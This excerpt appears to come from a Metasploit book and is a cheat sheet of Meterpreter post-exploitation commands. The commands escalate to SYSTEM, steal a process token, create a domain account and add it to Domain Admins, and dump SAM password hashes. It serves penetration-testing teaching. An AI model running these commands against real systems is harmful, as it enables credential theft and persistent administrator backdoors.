Meterpreter Post Exploitation Commands
Elevate your permissions on Windows-based systems using Meterpreter:
meterpreter >use priv
meterpreter >getsystem
Steal a domain administrator token from a given process ID, add a domain account, and then add it to the Domain Admins group:
meterpreter >ps
meterpreter >steal_token 1784
meterpreter >shell
C:\Windows\system32>net user metasploit p@55w0rd /ADD /DOMAIN
C:\Windows\system32>net group "Domain Admins" metasploit /ADD /DOMAIN
Dump password hashes from the SAM database:
meterpreter >use priv
meterpreter >getsystem
meterpreter >hashdump
Note
On Win2k8 you may need to migrate to a process that is running as SYSTEM if -getsystem
and hashdump
throw exceptions.
Automigrate to a separate process:
meterpreter ...
Get Metasploit now with the O’Reilly learning platform.
O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.